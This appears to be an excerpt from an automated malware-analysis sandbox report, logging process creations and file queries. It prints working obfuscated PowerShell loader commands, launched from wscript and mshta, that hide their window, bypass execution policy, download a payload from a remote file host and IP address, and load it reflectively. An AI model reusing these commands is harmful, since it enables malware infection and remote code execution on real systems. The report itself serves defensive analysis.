          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
          Source: explorer.exe, 0000001F.00000000.521478069.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000001F.00000000.521478069.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000001F.00000000.521478069.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_001755EB cpuid 38_2_001755EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
